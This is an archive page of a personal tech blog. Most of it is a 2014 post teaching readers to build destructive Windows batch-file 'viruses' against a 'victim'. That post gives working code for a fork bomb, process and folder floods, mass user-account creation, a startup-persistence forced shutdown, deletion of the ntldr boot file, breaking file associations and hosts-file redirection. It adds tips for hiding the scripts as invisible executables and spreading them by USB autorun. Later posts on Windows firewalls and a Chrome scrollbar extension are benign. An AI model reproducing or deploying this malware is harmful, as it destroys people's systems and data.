Wednesday 4 May 2016

For  My Dear Friends Having Problems in Identifying The components of mother Board

Thursday 1 May 2014

Hi friends Rohit Hea again after a long time . I just want to share something that i know about creatig VIRUS using BATCH FILES.  Batch files are type of executable files with the extention ".bat" . Coming to the point , we can create malicious and irritating virus just by typing their codes and saving them as .bat extension.

                                                                I could just you give the  codes to paste  in notepad and  ask you to save files with extension .bat and your deadly batch viruses would be ready to attack. But
instead of that, I have just focussed on making the basics of creating batch files clear and developing the approach to code your own viruses.So please just try to understand the code instead of copying it to notepad.
  • What are Batch Files ?
Lets start with a simple example , Open your command prompt(cmd) and change your current directory on to 'desktop' by typing 'cd desktop' without the quotes.
Now type these commands in order 
1. md a  //makes directory 'a' on desktop
2. cd a  // changes current directory to 'a'
3. md b // makes a directory 'b' in directory 'b'     
We first make a folder/directory 'a', then enter in folder  'a',then make a folder 'b' in folder 'a' . 
Now delete the folder 'a'.
Lets do the same thing in an other way. Type the same  three commands given above in the  notepad and save the file as anything.bat . You can give any name in place of 'anything'.                     
Now simply double click on this batch file and the same job will be done by the file created using notepad and by using command prompt(cmd) . You will get a folder with name 'a' on your desktop and another folder with name 'b' in it. This means the three commands are executed in order, when we ran the batch file 
So a batch file is nothing but  a text containing series of commands which are executed automatically line by line when the batch file is run. 
  • What can batch viruses do ?
They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.
Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (here  anything means any name youwant to give to your file  but extension must be .bat and save it as 'all files' instead of text files).
Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.
1.  Application Bomber
@echo off // It instructs to hide the commands when batch files is executed

:x   //loop variable
start winword
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start  opening different applications present in the system like paint,notepad,command prompt repeatedly(because of infinite loop), irritating the victim and ofcourse affecting the performance.

2. Folder flooder
@echo off
md %random% // makes directory or folder. 
goto x
Here %random% is a variable that would generate any positive number  randomly.  So this code will  start creating folders whose name can be any random number.
3.User account flooder 
@echo off
net user %random% /add //create user account
goto x
This code will start creating windows user accounts whose names could be any random numbers.

3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”  
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”    //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00  //this will shutdown the computer in 0 seconds  

Note : Files in Start up folder gets started automatically when windows starts .  You should  first two lines of  code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Everytime when the victim  start's the computer, this batch file in start up will run and shutdown the computer immediately. You will be able to remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder. 
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply 
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows. 
 Lets make a batch file to 
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr    //delete ntldr file

After running this batch file , system will not reboot and a normal victim should definitely install the windows again use his computer. 
5. Fork Bomb
%0|%0  //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything                          
Every extension is associated with a filetype like extension ‘.exe’. It  is associated with filetype ‘exe file’. To know these, just type ‘assoc’ in command prompt.
 Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files will not be able to open properly.
7.  DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.
  The code is:
@echo off
echo > C:\windows\system32\drivers\etc\hosts   //this command prints or add in hosts file. 
Replace  and with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.
Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
  • Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.
To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.Remamber the password is "darktechandhack" .
After running converter ,  open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.  
You can  use other options as per your requirement.

  • Spreading batch viruses through pen drive -:
Step 1:
Open notepad and write 
Save file as ‘autorun.inf’
Step 2: Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

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Tuesday 6 August 2013

why you don't need to install a third party firewall(and why you do)

Firewalls are an important piece of security software, and someone is always trying to sell you a new one. However, Windows has come with its own solid firewall since Windows XP SP2, and it’s more than good enough.
You also don’t need a full Internet security suite. All you really need to install on Windows 7 is an antivirus — and Windows 8 finally comes with an antivirus.
Why You Need a Firewall
The primary function of a firewall is to block unrequested incoming connections. Firewalls can block different types of connections intelligently — for example, they can allow access to network file shares and other services when your laptop is connected to your home network, but not when it’s connected to a public Wi-Fi network in a coffee shop.
A firewall helps block connections to potentially vulnerable services and controls access to network services — particularly file shares, but also other types of services — that should only be accessible on trusted networks.
Before Windows XP SP2, when the Windows Firewall was upgraded and enabled by default, Windows XP systems connected directly to the Internet became infected after four minutes on average. Worms like the Blaster worm tried to connect directly to everyone. Because it didn’t have a firewall, Windows let the Blaster worm right in.
A firewall would have protected against this, even if the underlying Windows software as vulnerable. Even if a modern version of Windows is vulnerable to such a worm, it will be extremely difficult to infect the computer because the firewall blocks all such incoming traffic.

Why the Windows Firewall is Good Enough
The Windows Firewall does the exact same job of blocking incoming connections as a third-party firewall. Third-party firewalls like the one included with Norton may pop up more often, informing you that they’re working and asking for your input, but the Windows firewall is constantly doing its thankless job in the background.
It’s enabled by default and should still enabled unless you’ve disabled it manually or installed a third-party firewall. You can find its interface under Windows Firewall in the Control Panel.
When a program wants to receive incoming connections, it must create a firewall rule or pop up a dialog and prompt you for permission.

When You Would Want a Third-Party Firewall
By default, the Windows firewall only does what’s really important: block incoming connections. It has some more advanced features, but they’re in a hidden, harder-to-use interface.
For example, most third-party firewalls allow you to easily control which applications on your computer can connect to the Internet. They’ll pop up a box when an application first initiates an outgoing connection. This allows you to control which applications on your computer can access the Internet, blocking certain applications from connecting.
Power users may love this feature, but it’s probably not a good feature for the average user. They’ll be charged with identifying applications that should be allowed to connect and may block background-updater processes from connecting, preventing their software from updating and leaving it vulnerable. It’s also a very noisy task, as you’ll have to confirm a prompt box every time a new application wants to connect. If you really don’t trust a program to connect to the Internet, perhaps you shouldn’t be running the program on your computer in the first place.
Nevertheless, if you want outgoing-connection management, you’ll probably want a third-party firewall. They also offer an interface where you can more easily view statistics, firewall logs, and other information.
For most users, using a third-party firewall just introduces unnecessary complexity.

Advanced Windows Firewall Features
The Windows firewall actually has more features than you might expect, though its interface isn’t as friendly:

A third-party firewall is a power-user tool — not an essential piece of security software. The Windows firewall is solid and trustworthy. While people can quibble about the Microsoft Security Essentials/Windows Defender virus detection rate, the Windows firewall does just as good a job of blocking incoming connections as other firewalls.

Thursday 1 August 2013

Don’t like Chrome’s scrollbar? Then change it with Rescroller

Scrollbars are an essential part of every modern web browser due to the sheer amount of window sizes that browser's support. If a website cannot be displayed fully on the screen because it is larger than the window or screen size, scrollbars are usually displayed to take that into account and provide users with options to access all contents of the site with the input device of choice.
The scrollbar in addition can help with orientation on a website, as you know where you are in relation to the top and bottom of the page (and left and right).
Despite being essential, scrollbar styles have not really changed in recent time. That does not mean that you cannot modify how the scrollbar looks like in your browser of choice, only that you need to either use extensions to modify its style and size, or CSS styles directly.

google chrome custom scrollbar 
Rescroller for Google Chrome provides you with detailed scrollbar customization options. It allows you to modify the following parameters:
  • The size of the scrollbar from hiding it completely to real big (30px). You can furthermore black list sites that you want to use the default formatting on.
  • Change the colors of the scrollbar. This includes the main color, as well as colors for shadow and border effects. You can alternatively replace the solid scrollbar color with an image, and that is possible for vertical and horizontal scrollbars separately.
  • Add rounded corners to the scrollbar.
  • Customize the scrollbar style (color, images and shadows) when hovering or clicking.
  • Change the background color of the scrollbar, or use an image for it as well. Again with shadow, border and main color options, rounded corners, and options to customize styles when hovering or clicking.
  • Add scroll buttons to the top, bottom, right and left of the scrollbar so that you canc lcik on those to scroll.
  • Apply custom CSS code, sub-background and corner colors.
The extension will override all scrollbars, even those that use custom styles, unless you have added a website to the blacklist.


The Rescroller extension leaves little to be desired. It enables you to remove scrollbars completely if you want to, or modify them to your liking. The extension is easy to configure and if something goes wrong, all you have to do is click on the reset formatting button to start anew.
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Tuesday 23 July 2013

Hi frends i am a hardware and networking professional having 5 years of experience in the field of computer technology tot of creating a blog so that i can help out you in solving problems related to computer hardware and networking problem .. so friends if you have any problems ...please post by so that i can solve it out .. thank you friends.....